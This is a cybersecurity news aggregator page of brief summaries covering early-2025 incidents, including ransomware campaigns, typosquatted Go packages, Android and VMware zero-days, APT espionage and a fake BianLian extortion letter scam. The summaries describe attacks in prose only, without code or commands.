CyberSecurity news
FlagThis
|
Steven Campbell@Arctic Wolf - 18m
The FBI has issued a warning regarding a new data extortion scam where criminals are impersonating the BianLian ransomware group. These fraudsters are sending physical letters through the United States Postal Service to corporate executives, claiming their networks have been breached. The letters demand Bitcoin payments in exchange for preventing the release of sensitive company data.
Analysis suggests these letters are fraudulent, and organizations, particularly within the US healthcare sector, are advised to report such incidents to the FBI. Security vendors, including Arctic Wolf and Guidepoint Security, have studied these letters and believe the campaign is a ruse by someone pretending to be BianLian. The letters mimic conventional ransom notes, demanding payments of between $250,000 to $350,000 within 10 days. This activity highlights the evolving tactics of cybercriminals who are now employing postal mail to target high-profile individuals in an attempt to extort money under false pretenses. The FBI urges companies to implement internal protocols for verifying ransom demands and to remain vigilant against these deceptive practices. It’s crucial for organizations to discern fake attacks from real ones amidst the increasing complexity of cybercrime. Recommended read:
References :
eff.org via@lobste.rs - 5h
The Electronic Frontier Foundation (EFF) has launched Rayhunter, a new free and open-source tool designed to detect cell-site simulators (CSS), also known as IMSI catchers or Stingrays. These devices masquerade as legitimate cell towers, tricking phones into connecting to them. Law enforcement and other entities use CSS to pinpoint the location of phones and log identifying information, sometimes intercepting communications.
Rayhunter operates using an affordable mobile hotspot, empowering individuals, regardless of their technical skills, to search for CSS around the world. The EFF hopes this tool will help uncover how these devices are being used, as there is a lack of solid, empirical evidence about the function and usage of CSS. Police departments are often resistant to releasing logs of their use, and the companies that manufacture them are unwilling to divulge details of how they work. Recommended read:
References :
Alex Lekander@CyberInsider - 7h
The U.S. Department of Justice has charged 12 Chinese nationals in connection with a long-running cyber espionage campaign. These individuals, allegedly linked to Chinese state security and hacking groups like APT27 and i-Soon, are accused of targeting victims worldwide since 2011. The Justice Department has initiated a crackdown on the Chinese hacking network referred to as Silk Typhoon and the charges include attacks targeting US infrastructure.
The hacking group Silk Typhoon, believed to be behind the US Treasury break-in, has been actively targeting IT companies and government agencies since late 2024. Using stolen API keys and cloud credentials, they infiltrated organizations, seeking data related to US government policies, legal processes, and law enforcement investigations. Recommended read:
References :
Kirsten Doyle@Information Security Buzz - 7h
Proofpoint researchers have uncovered a cyber espionage campaign targeting the aviation and satellite communications sectors in the United Arab Emirates (UAE). Attributed to the threat cluster UNK_CraftyCamel, the operation involved exploiting trusted business relationships to infiltrate critical infrastructure. The attackers compromised an email account belonging to INDIC Electronics, an Indian electronics company, to send spear-phishing emails containing malicious URLs to fewer than five targeted organizations in the UAE, which begun in October 2024.
The malicious URLs mimicked legitimate domains and led recipients to download a ZIP archive embedded with polyglot files, designed to evade detection by exploiting format-specific quirks. Upon execution, the LNK file triggered a chain of events that installed a custom backdoor named "Sosano." Sosano, written in Golang, connects to a command-and-control server and supports commands for directory traversal, payload downloading, shell command execution, and directory deletion. Researchers noted similarities between UNK_CraftyCamel's tactics and those of Iranian-aligned groups, but assess it as a distinct entity. Recommended read:
References :
Kirsten Doyle@Information Security Buzz - 7h
References:
Information Security Buzz
, Anonymous ???????? :af:
,
Socket researchers have discovered a malicious campaign infiltrating the Go ecosystem using typosquatted packages. These packages are designed to install hidden loader malware targeting Linux and macOS systems. The threat actor has published at least seven packages that impersonate widely used Go libraries.
These malicious packages share repeated malicious filenames and consistent obfuscation techniques, suggesting a coordinated threat actor. One of the packages appears to target financial-sector developers. The typosquatted packages can execute remote code, potentially stealing data or credentials. Recommended read:
References :
securebulletin.com@Secure Bulletin - 22h
New research indicates a connection between the Black Basta and Cactus ransomware gangs, with both groups employing similar social engineering attacks and the BackConnect proxy malware to gain persistent access to corporate networks. Trend Micro researchers have highlighted how both ransomware groups utilize the BackConnect (BC) module to maintain control over infected hosts and exfiltrate sensitive data. The use of QBACKCONNECT suggests a close working relationship between Black Basta and the QakBot developers.
The BackConnect module, tracked as QBACKCONNECT due to its overlaps with the QakBot loader, grants attackers a wide range of remote control capabilities. This allows them to execute commands, steal sensitive data, such as login credentials, financial information, and personal files. Researchers observed a CACTUS ransomware attack that mirrored Black Basta's methods in deploying BackConnect, but extended their operations to include lateral movement and data exfiltration. Recommended read:
References :
Aman Mishra@gbhackers.com - 22h
References:
gbhackers.com
, www.bleepingcomputer.com
Cybersecurity researchers have revealed a sophisticated campaign where hackers are exploiting Microsoft Teams and Quick Assist for remote access. The attacks have been attributed to ransomware groups such as Black Basta and Cactus, highlighting a growing trend of cybercriminals abusing legitimate tools to bypass security defenses and infiltrate corporate networks. The attackers use social engineering tactics, including email flooding, followed by direct contact via Microsoft Teams, impersonating IT support staff to trick victims into granting access through Microsoft’s Quick Assist tool.
Once inside, attackers deploy additional malware by abusing OneDriveStandaloneUpdater.exe, a legitimate Microsoft process. By sideloading malicious DLLs, they establish persistent control and use BackConnect malware for command-and-control communication. This campaign has impacted various regions and industries, with a significant number of incidents occurring in North America, particularly the United States, and Europe. Manufacturing, financial services, and real estate sectors have been particularly targeted, as these threat actors are actively working around conventional security measures. Recommended read:
References :
Pierluigi Paganini@Security Affairs - 1d
Google has released the March 2025 Android Security Bulletin, which addresses 44 vulnerabilities. Notably, the update includes patches for two zero-day flaws, identified as CVE-2024-43093 and CVE-2024-50302, that are actively being exploited in the wild. The high-severity vulnerability CVE-2024-43093 is a privilege escalation flaw in the Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories, and their respective sub-directories. CVE-2024-50302 is also a privilege escalation flaw in the HID USB component of the Linux kernel that could lead to a leak of uninitialized kernel memory to a local attacker through specially crafted HID reports.
This security update arrives after reports surfaced that Serbian authorities used one of these zero-day vulnerabilities to unlock confiscated devices. Google acknowledged that both CVE-2024-43093 and CVE-2024-50302 have come under "limited, targeted exploitation." The company has released two security patch levels to allow Android partners flexibility in addressing vulnerabilities across devices more quickly. The security patch levels are 2025-03-01 and 2025-03-05. Recommended read:
References :
Business Wire@ai-techpark.com - 2d
References:
ai-techpark.com
, www.networkworld.com
,
SolarWinds has acquired Squadcast, an incident response startup, to enhance its observability platform. The move aims to provide customers with intelligent automation capabilities, leading to faster incident resolution and a significant reduction in mean time to resolution (MTTR). By integrating Squadcast's technology, SolarWinds seeks to streamline incident management, improve operational resilience, and empower IT professionals to effectively manage hybrid ecosystems amidst a growing influx of alerts.
SolarWinds plans to combine Squadcast’s intelligent incident response product into its observability platform to accelerate MTTR. Squadcast's platform offers features such as on-call management, incident response, reliability workflows, and continuous learning capabilities. Squadcast reports that its users see benefits such as a 68% reduction in the average MTTR and save some 1,000 work hours and $500,00 in costs. Financial details of the acquisition were not disclosed. Recommended read:
References :
Pierluigi Paganini@Security Affairs - 2d
The Polish Space Agency (POLSA) has shut down its systems and disconnected from the internet following a major cyberattack detected over the weekend. The agency confirmed the unauthorized intrusion into its IT infrastructure, prompting an immediate response to secure sensitive data. Cybersecurity teams are actively working to restore operations, with the Polish Computer Security Incident Response Team (CSIRT NASK) and the Polish Military CSIRT (CSIRT MON) assisting POLSA in securing affected systems.
Poland's Minister of Digital Affairs, Krzysztof Gawkowski, stated that the systems under attack were secured and that intensive operational activities are underway to identify the perpetrators behind the cyberattack. While the exact nature of the breach remains undisclosed, sources suggest that POLSA’s internal email systems were compromised, forcing employees to communicate via phone. Amid escalating cyber threats, Poland is significantly ramping up its cybersecurity defenses, with suspicions pointing towards Russian involvement. Recommended read:
References :
@csoonline.com - 2d
Broadcom has issued emergency security patches for VMware ESXi, Workstation, and Fusion products, addressing three zero-day vulnerabilities actively exploited in the wild. These flaws can lead to virtual machine escape, allowing attackers to potentially gain control of the host systems. VMware products, including VMware vSphere, VMware Cloud Foundation, and VMware Telco Cloud Platform, are affected. Broadcom credited Microsoft's MSTIC security team with spotting and reporting the attacks.
The vulnerabilities were discovered by Microsoft and are actively being exploited. Patches are now available to address these critical security issues, and users of affected VMware products are strongly advised to apply the updates immediately to mitigate the risk of exploitation. Information on the patches can be found at the link provided by Broadcom (CVE-2025-22224: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390). Recommended read:
References :
@cyberalerts.io - 2d
ISPs Targeted in Mass Exploitation for Crypto Miners - A mass exploitation campaign targets ISPs in China and the U.S. West Coast, deploying information stealers and crypto miners by exploiting weak credentials.
ImgSrc: blogger.googleu
References:
Virus Bulletin
, securityaffairs.com
,
A mass exploitation campaign has targeted internet service providers (ISPs) in China and the U.S. West Coast, resulting in the deployment of information stealers and cryptocurrency miners. The Splunk Threat Research Team identified over 4,000 ISP IPs targeted in these brute-force attacks, exploiting weak credentials to gain initial access. Attackers are leveraging this access to deploy payloads designed for data exfiltration and establishing persistence within compromised systems.
The attacks involve minimal intrusive operations to avoid detection, primarily using scripting languages like Python and PowerShell for command-and-control (C2) operations via Telegram. Upon gaining access, attackers deploy executables via PowerShell for network scanning, information theft, and XMRig cryptocurrency mining. The deployed stealer malware captures screenshots and steals clipboard content, searching for cryptocurrency wallet addresses, with gathered information exfiltrated to a Telegram bot. The attackers specifically targeted CIDRs of ISP infrastructure providers using a masscan tool to identify open ports and conduct credential brute-force attacks. Recommended read:
References :
@cyberalerts.io - 3d
A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands, which subsequently deploy the Havok post-exploitation framework. This framework grants attackers remote access to compromised devices. The attackers cleverly conceal the different stages of their malware within SharePoint sites and employ a modified version of Havoc Demon in tandem with the Microsoft Graph API. This tactic is used to obfuscate command-and-control (C2) communications, making them appear as legitimate traffic within trusted Microsoft services.
The attack starts with a phishing email that has a HTML attachment, when opened, displays an error message, which uses the ClickFix technique to trick users into copying and executing a malicious PowerShell command into their terminal or PowerShell, thereby triggering the next-stage. The command downloads and executes a PowerShell script hosted on a server controlled by the attacker. This script checks for sandboxed environments, downloads the Python interpreter if needed, and executes a Python script serving as a shellcode loader for KaynLdr, launching the Havoc Demon agent on the infected host. Recommended read:
References :
@securityboulevard.com - 3d
US Halts Cyber Operations Targeting Russia - The US Cyber Command has allegedly halted offensive cyber operations against Russia, leading to concerns about cybersecurity posture and potential shifts in alliances.
ImgSrc: securitybouleva
Reports indicate that the US Cyber Command has been ordered to halt offensive cyber operations against Russia, leading to concerns about the nation's cybersecurity posture. This decision comes amid efforts by the Trump administration to potentially offer concessions to Moscow in hopes of ending the war in Ukraine. Such a shift would mark a significant departure from longstanding assessments that have identified Russia as a major cyber threat.
While some reports suggest that CISA has also changed its priorities, focusing more on China and less on Russia, CISA denies any changes to its mission. The agency maintains that it continues to defend against all cyber threats, including those originating from Russia. However, this situation has drawn criticism from security professionals, who fear that reducing focus on Russian cyber activities could make the country more vulnerable and alter key international alliances. Recommended read:
References :
Aman Mishra@gbhackers.com - 3d
A cyber threat group known as JavaGhost has been exploiting misconfigured Amazon Web Services (AWS) Identity and Access Management (IAM) permissions to conduct sophisticated phishing campaigns. Palo Alto Networks Unit 42 is tracking this group, known as TGR-UNK-0011, which overlaps with JavaGhost. Since 2022, JavaGhost pivoted from website defacement to cloud-based phishing attacks, targeting unsuspecting targets for financial gain.
The group exploits leaked long-term AWS access keys to gain initial access, then misuses AWS services like Simple Email Service (SES) and WorkMail to send phishing emails, bypassing typical email protections. They create new SMTP credentials and IAM users, some for active attacks and others for long-term persistence, even leaving the same calling card in the middle of their activities. JavaGhost's tactics include generating temporary credentials and utilizing advanced evasion techniques to obfuscate their identities in CloudTrail logs, a tactic historically used by Scattered Spider. The attackers create IAM roles with trust policies, allowing access from attacker-controlled AWS accounts, and attempt to enable all AWS regions to potentially evade security controls. These activities leave detectable events in CloudTrail logs, providing opportunities for threat detection and response for vigilant organizations. Recommended read:
References :
Pierluigi Paganini@Security Affairs - 3d
Ransomware gangs are actively exploiting a zero-day flaw in the BioNTdrv.sys driver of Paragon Partition Manager. Microsoft has issued a warning about this actively exploited vulnerability, noting that attackers are leveraging it in ransomware attacks. Security researchers have uncovered five distinct vulnerabilities within the driver, which could allow malicious actors to escalate their privileges to SYSTEM level or cause denial-of-service (DoS) attacks.
These vulnerabilities include arbitrary kernel memory mapping and write issues, a null pointer dereference, insecure kernel resource access, and an arbitrary memory move vulnerability. Attackers can exploit these weaknesses, particularly in BioNTdrv.sys versions 1.3.0 and 1.5.1, even on systems without Paragon Partition Manager installed, using the "Bring Your Own Vulnerable Driver" (BYOVD) technique. Paragon Software has released an updated driver, BioNTdrv.sys version 2.0.0, for its Hard Disk Manager family products starting from version 17.45.0, to address these critical flaws. Recommended read:
References :
Titiksha Srivastav@The420.in - 3d
Lee Enterprises, a major American media company with over 75 publications, has confirmed a ransomware attack that has disrupted operations across its network. The notorious Qilin ransomware gang has claimed responsibility for the February 3rd attack, alleging the theft of 350GB of sensitive data. This stolen data purportedly includes investor records, financial arrangements, payments to journalists and publishers, funding for tailored news stories, and even approaches to obtaining insider information. The cyberattack has resulted in widespread outages, significantly impacting the distribution of printed newspapers, subscription services, and internal business operations.
The attack has caused delays in the distribution of print publications and has partially limited online operations. Lee Enterprises anticipates a phased recovery over the next several weeks and has implemented temporary measures, including manual processing of transactions. The company has also launched a forensic investigation to determine the full extent of the breach. The Qilin ransomware group's actions have brought attention to the increasing threat facing media organizations and the importance of robust cybersecurity measures to protect sensitive information and maintain operational integrity. Recommended read:
References :
Fred Oh@NVIDIA Newsroom - 4d
References:
NVIDIA Newsroom
, TechPowerUp
NVIDIA's CUDA libraries are increasingly vital in modern cybersecurity, bolstering defenses against emerging cyber threats like malware, ransomware, and phishing. Traditional cybersecurity measures struggle to keep pace with these evolving threats, especially with the looming risk of quantum computers potentially decrypting today's data through "harvest now, decrypt later" strategies. NVIDIA's accelerated computing and high-speed networking technologies are transforming how organizations protect their data, systems, and operations, enhancing both security and operational efficiency.
CUDA libraries are crucial for accelerating AI-powered cybersecurity. NVIDIA GPUs are essential for training and deploying AI models, offering faster AI model training, enabling real-time inference for identifying vulnerabilities, and automating repetitive security tasks. For example, AI-driven intrusion detection systems, powered by NVIDIA GPUs, can analyze billions of events per second to detect anomalies that traditional systems might miss. This real-time threat detection and response capability minimizes downtime and allows businesses to respond proactively to potential cyberattacks. Recommended read:
References :
@Talkback Resources - 4d
Cybersecurity researchers have unveiled advanced obfuscation tactics employed by APT28, a Russian state-sponsored threat actor, in their HTA Trojan. The investigation focuses on espionage campaigns targeting Central Asia and Kazakhstan diplomatic relations, revealing intricate multi-layer obfuscation strategies designed to evade detection. The analysis highlights the use of Microsoft’s VBE technique within HTA files as a core component of APT28’s malware delivery mechanism. This encoding method, facilitated by the Windows Script Encoder, transforms VBScript and JavaScript files into obfuscated formats that remain executable while concealing their true functionality.
The investigation uncovered that the malware leverages Windows’ vbscript.dll to generate embedded strings dynamically during execution. By analyzing these strings and their interaction with memory addresses, researchers were able to reconstruct the original VBScript payload hidden within the HTA file. Using publicly available tools like “vbe-decoder.py,” they successfully deobfuscated the encoded scripts, exposing the final malicious payload designed for espionage activities. This discovery underscores the need for robust malware analysis capabilities and proactive threat intelligence sharing within the cybersecurity community. Recommended read:
References :
|
